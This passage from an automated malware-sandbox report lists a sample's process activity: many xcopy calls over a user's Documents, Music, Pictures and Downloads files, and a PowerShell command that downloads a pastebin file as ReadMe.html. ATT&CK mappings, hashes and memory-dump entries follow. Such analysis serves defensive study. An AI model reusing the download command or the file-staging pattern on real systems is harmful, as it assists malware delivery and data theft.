  xcopy /y C:\Users\Admin\Documents\ConvertFromEnable.rtf
  2⤵
  PID:1896
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\DenyResume.ods
  2⤵
  PID:1684
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\DismountPing.odt
  2⤵
  PID:1452
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\ExitClear.odp
  2⤵
  PID:468
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\ExportSync.vsw
  2⤵
  PID:1224
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\Files.docx
  2⤵
  PID:1744
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\FormatNew.mhtml
  2⤵
  PID:1136
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\FormatUnlock.xml
  2⤵
  PID:1732
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\GrantDebug.pps
  2⤵
  PID:1748
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\ImportSearch.pps
  2⤵
  PID:1868
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\JoinPush.xps
  2⤵
  PID:1656
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\Opened.docx
  2⤵
  PID:112
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\PingExpand.pub
  2⤵
  PID:1556
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\PopGrant.vsx
  2⤵
  PID:1700
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\PublishWrite.docm
  2⤵
  PID:1760
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\Recently.docx
  2⤵
  PID:1396
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\ShowUse.xla
  2⤵
  PID:1576
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\StartAdd.odp
  2⤵
  PID:672
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\StartEdit.vssm
  2⤵
  PID:336
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\SuspendStop.vsdx
  2⤵
  PID:1956
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\SwitchInstall.pot
  2⤵
  PID:1068
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\These.docx
  2⤵
  PID:1076
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\UninstallMerge.vst
  2⤵
  PID:1836
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\UnpublishClear.docm
  2⤵
  PID:1452
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\AddRestart.M2V
  2⤵
  PID:1728
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\BackupDismount.fon
  2⤵
  PID:468
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\CloseFormat.raw
  2⤵
  PID:1468
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\CompleteExport.wpl
  2⤵
  PID:1676
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\DismountConvertTo.wmv
  2⤵
  PID:1504
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\DismountRegister.xht
  2⤵
  PID:1604
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\DismountUnprotect.easmx
  2⤵
  PID:1620
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\ExportSend.jpeg
  2⤵
  PID:1348
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\GrantClose.wvx
  2⤵
  PID:1276
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\InitializeLimit.vdx
  2⤵
  PID:560
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\JoinRestore.M2T
  2⤵
  PID:1340
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\LimitBackup.pps
  2⤵
  PID:1672
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\OpenTest.jpg
  2⤵
  PID:1900
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\OutStop.bat
  2⤵
  PID:812
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\PingConfirm.vst
  2⤵
  PID:1688
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\RedoConfirm.kix
  2⤵
  PID:968
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\RemoveRename.ADTS
  2⤵
  PID:1904
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\RenameTrace.7z
  2⤵
  PID:1896
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\RepairExpand.au3
  2⤵
  PID:1976
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\ResolveTrace.txt
  2⤵
  PID:1684
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\ResumeUpdate.ttf
  2⤵
  PID:1716
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\SaveFormat.vbs
  2⤵
  PID:936
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\SearchEnter.edrwx
  2⤵
  PID:1448
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\SearchStep.cr2
  2⤵
  PID:2016
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\SelectSave.M2V
  2⤵
  PID:1224
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\SetDeny.exe
  2⤵
  PID:1744
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\SuspendBlock.dwg
  2⤵
  PID:1136
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\SwitchNew.dwfx
  2⤵
  PID:1732
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\ConfirmSwitch.jpg
  2⤵
  PID:1748
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\ConvertFromExport.dwg
  2⤵
  PID:1276
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\DebugSend.pcx
  2⤵
  PID:560
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\DisableStep.dwg
  2⤵
  PID:1340
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\DismountMove.bmp
  2⤵
  PID:1672
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\DismountSearch.dxf
  2⤵
  PID:1900
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\EditGroup.jpg
  2⤵
  PID:812
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\ExportHide.jpeg
  2⤵
  PID:1688
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\FindUndo.tif
  2⤵
  PID:968
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\FormatGet.tif
  2⤵
  PID:1904
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\InvokeFind.emf
  2⤵
  PID:1896
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\LockDisable.svg
  2⤵
  PID:1976
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\MeasureCheckpoint.emz
  2⤵
  PID:1684
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\My Wallpaper.jpg
  2⤵
  PID:1716
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\NewCopy.jpg
  2⤵
  PID:936
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\PingCompress.ico
  2⤵
  PID:1448
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\ProtectMeasure.png
  2⤵
  PID:2016
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\PublishWait.raw
  2⤵
  PID:1224
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\RedoRevoke.wmf
  2⤵
  PID:1744
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\RenameExit.tif
  2⤵
  PID:1136
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\ResolveShow.dib
  2⤵
  PID:1732
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\RestoreLimit.crw
  2⤵
  PID:1748
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\RestoreUndo.crw
  2⤵
  PID:1276
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\ResumeInitialize.cr2
  2⤵
  PID:560
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\SubmitDebug.dib
  2⤵
  PID:1340
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\SwitchExport.dxf
  2⤵
  PID:1672
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\TraceNew.pcx
  2⤵
  PID:1900
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\UnlockSave.emz
  2⤵
  PID:812
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\UnregisterNew.emz
  2⤵
  PID:1688
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\UnregisterShow.jpg
  2⤵
  PID:968
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\WaitOpen.jpg
  2⤵
  PID:1904
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\WriteSkip.raw
  2⤵
  PID:1896
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\ApproveClear.fon
  2⤵
  PID:1976
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\BlockPop.mid
  2⤵
  PID:1684
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\CheckpointJoin.mpeg
  2⤵
  PID:1716
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\ClearUnblock.txt
  2⤵
  PID:936
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\DebugSkip.xls
  2⤵
  PID:1448
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\DenyRedo.snd
  2⤵
  PID:2016
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\DisableGet.wmx
  2⤵
  PID:1224
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\DisconnectConvert.vdx
  2⤵
  PID:1744
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\DisconnectRequest.html
  2⤵
  PID:1136
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\ExpandConfirm.sql
  2⤵
  PID:1732
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\GrantClose.gif
  2⤵
  PID:1748
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\GroupConfirm.jfif
  2⤵
  PID:1276
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\HideCompress.wdp
  2⤵
  PID:560
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\HideUnlock.iso
  2⤵
  PID:1340
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\ImportHide.ppt
  2⤵
  PID:1672
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\InstallSkip.mp2
  2⤵
  PID:1900
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\LockSplit.TTS
  2⤵
  PID:812
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\MeasureDisable.php
  2⤵
  PID:1688
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\MeasureWait.TTS
  2⤵
  PID:968
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\NewTest.wm
  2⤵
  PID:1904
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\PublishRegister.cab
  2⤵
  PID:1896
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\ReadStop.xsl
  2⤵
  PID:1976
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\RemoveCheckpoint.shtml
  2⤵
  PID:1684
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\ResetPush.aiff
  2⤵
  PID:1716
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\RestoreRequest.wax
  2⤵
  PID:936
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\RevokeDisconnect.M2V
  2⤵
  PID:1448
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\SaveUse.MOD
  2⤵
  PID:2016
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\SelectInstall.3g2
  2⤵
  PID:1224
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\SuspendOpen.mpp
  2⤵
  PID:1744
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\TraceGroup.jpeg
  2⤵
  PID:1136
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\UninstallEdit.wpl
  2⤵
  PID:1732
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\UnlockSplit.AAC
  2⤵
  PID:1748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest https://pastebin.com/raw/CSGTwG5A -outfile ReadMe.html"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1276

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
db8349341427b8c6723a6307bcfde310

SHA1
3af17699c8a60c2d110cb5768af1591c7ed742cf

SHA256
0d120c081d1099e20b7095a7aef3da3d697790a96c28e363e6eb1148e4fec64d

SHA512
931fadf2bf665509c48af49db9ca95e671db5f1ca03152cec97621e88964cc5ce00db9eed5b5ab4074131ef84df062ca52b4ab606a275ae11d36a41a4b7e5de4

Download Submit
C:\Users\Admin\Documents\black.bat

Filesize
71B

MD5
3544e4b7ac1418d34061648a9f3e3dc6

SHA1
30e88f4aa1cc6c936c9c274f9f4f53b491a4d8ce

SHA256
db24f2b49b88e4cf7c3569a067f3e6e325d54a3be2368262d37a6a34f4f8aae8

SHA512
5d3048b421b4900efdce377d61f8965beb4bc02db27875c03eb378cd9996de9a01b63e54e99b4f94e4cf14e1b60d873d715ccea38fd0bdc1200ad3a2f268e126

Download Submit
memory/1276-136-0x000000000283B000-0x000000000285A000-memory.dmp

Filesize
124KB

Download
memory/1276-133-0x000007FEF2F60000-0x000007FEF3ABD000-memory.dmp

Filesize
11.4MB

Download
memory/1276-135-0x000000001B6F0000-0x000000001B9EF000-memory.dmp

Filesize
3.0MB

Download
memory/1276-134-0x0000000002834000-0x0000000002837000-memory.dmp

Filesize
12KB

Download
memory/1276-132-0x000007FEF3AC0000-0x000007FEF44E3000-memory.dmp

Filesize
10.1MB

Download
memory/1468-56-0x000007FEFC4B1000-0x000007FEFC4B3000-memory.dmp

Filesize
8KB

Download
memory/1468-57-0x000007FEF4460000-0x000007FEF4E83000-memory.dmp

Filesize
10.1MB

Download
memory/1468-59-0x0000000001EC0000-0x0000000001F40000-memory.dmp

Filesize
512KB

Download
memory/1468-58-0x000007FEF3900000-0x000007FEF445D000-memory.dmp

Filesize
11.4MB

Download